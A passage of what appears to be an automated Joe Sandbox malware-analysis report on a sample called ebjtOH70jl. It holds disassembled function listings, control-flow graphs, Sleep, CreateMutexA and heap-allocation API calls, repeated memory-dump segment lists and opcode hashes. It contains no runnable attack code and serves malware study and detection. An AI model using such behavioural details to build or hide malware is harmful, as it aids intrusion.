                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID: @2
                                                                                                                                                                                                                                                    • API String ID: 1279760036-3701443097
                                                                                                                                                                                                                                                    • Opcode ID: 8903cc7de2bb0b1c20432382ae3261f27eb120e4516a978dcb25ff68f02a1272
                                                                                                                                                                                                                                                    • Instruction ID: 4ee5d1d73f596c0ebda38c63e98e3c0bc0bace8e1bf39b1e4fd2fce91457acd7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8903cc7de2bb0b1c20432382ae3261f27eb120e4516a978dcb25ff68f02a1272
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F0E231A06225669B297B629D41A6B3B999F837B0B188111EC87AB9C1CF34D80056E0
                                                                                                                                                                                                                                                    Function 00A79AD5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 201 a79ad5-a79cc1 call a87870 call a75b20 call a78a60 call a88150
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: 646159d8495e369e775b310d6f64fafd25f86b79918e76d5f8526f3b5343db73
                                                                                                                                                                                                                                                    • Instruction ID: 79c4e9bb9de042288dbbf77720fbbe77c8e9f9b0f281ac68afce907cf3e7670d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 646159d8495e369e775b310d6f64fafd25f86b79918e76d5f8526f3b5343db73
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A317071B002049BEB1CDB78ED8976EB7B2EFD6310F20C219E0189B3D5C77599818B52
                                                                                                                                                                                                                                                    Function 00A79E74 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 223 a79e74-a79e94 227 a79e96-a79ea2 223->227 228 a79ec2-a79ede 223->228 231 a79ea4-a79eb2 227->231 232 a79eb8-a79ebf call a8d593 227->232 229 a79ee0-a79eec 228->229 230 a79f0c-a79f2b 228->230 235 a79f02-a79f09 call a8d593 229->235 236 a79eee-a79efc 229->236 237 a79f2d-a79f39 230->237 238 a79f59-a7a846 call a87f30 230->238 231->232 233 a7a85b 231->233 232->228 240 a7a883-a7a8c4 Sleep CreateMutexA 233->240 241 a7a85b call aa6b9a 233->241 235->230 236->233 236->235 244 a79f4f-a79f56 call a8d593 237->244 245 a79f3b-a79f49 237->245 253 a7a8d7-a7a8d8 240->253 254 a7a8c6-a7a8c8 240->254 241->240 244->238 245->233 245->244 254->253 255 a7a8ca-a7a8d5 254->255 255->253
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: dd9856503bb179dc23e30054533f40be9b0a078f29b53e9ac3b7621293533630
                                                                                                                                                                                                                                                    • Instruction ID: 255ecd3840dae88746fbfa6a02ca6d4f906bcce98d3584dc91552a858b89e35e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd9856503bb179dc23e30054533f40be9b0a078f29b53e9ac3b7621293533630
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78312C31B002049BEB1CDB78DD897ADB7A2EBD6310F20C62DE418E73D5D73599818B52
                                                                                                                                                                                                                                                    Function 00A79FA9 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 257 a79fa9-a79fc9 261 a79ff7-a7a013 257->261 262 a79fcb-a79fd7 257->262 265 a7a015-a7a021 261->265 266 a7a041-a7a060 261->266 263 a79fed-a79ff4 call a8d593 262->263 264 a79fd9-a79fe7 262->264 263->261 264->263 269 a7a860 264->269 271 a7a037-a7a03e call a8d593 265->271 272 a7a023-a7a031 265->272 267 a7a062-a7a06e 266->267 268 a7a08e-a7a846 call a87f30 266->268 274 a7a084-a7a08b call a8d593 267->274 275 a7a070-a7a07e 267->275 277 a7a883-a7a8c4 Sleep CreateMutexA 269->277 278 a7a860 call aa6b9a 269->278 271->266 272->269 272->271 274->268 275->269 275->274 287 a7a8d7-a7a8d8 277->287 288 a7a8c6-a7a8c8 277->288 278->277 288->287 289 a7a8ca-a7a8d5 288->289 289->287
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: ee74afa7cf0f3166bddd2c8b9778bec01b6adb7296e137c0e060a7e4e7a78afb
                                                                                                                                                                                                                                                    • Instruction ID: 068211f3f84be1397da2acafbb0185c0fdc6c9b7ab75061990eb0540cfb395b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee74afa7cf0f3166bddd2c8b9778bec01b6adb7296e137c0e060a7e4e7a78afb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF313D31B00204ABEB1CDB78DD88B6DB7B2EBD6314F24C619E018D77D5C77999818B52
                                                                                                                                                                                                                                                    Function 00A7A0DE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 291 a7a0de-a7a0fe 295 a7a100-a7a10c 291->295 296 a7a12c-a7a148 291->296 299 a7a122-a7a129 call a8d593 295->299 300 a7a10e-a7a11c 295->300 297 a7a176-a7a195 296->297 298 a7a14a-a7a156 296->298 303 a7a197-a7a1a3 297->303 304 a7a1c3-a7a846 call a87f30 297->304 301 a7a16c-a7a173 call a8d593 298->301 302 a7a158-a7a166 298->302 299->296 300->299 305 a7a865-a7a8c4 call aa6b9a Sleep CreateMutexA 300->305 301->297 302->301 302->305 309 a7a1a5-a7a1b3 303->309 310 a7a1b9-a7a1c0 call a8d593 303->310 321 a7a8d7-a7a8d8 305->321 322 a7a8c6-a7a8c8 305->322 309->305 309->310 310->304 322->321 323 a7a8ca-a7a8d5 322->323 323->321
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
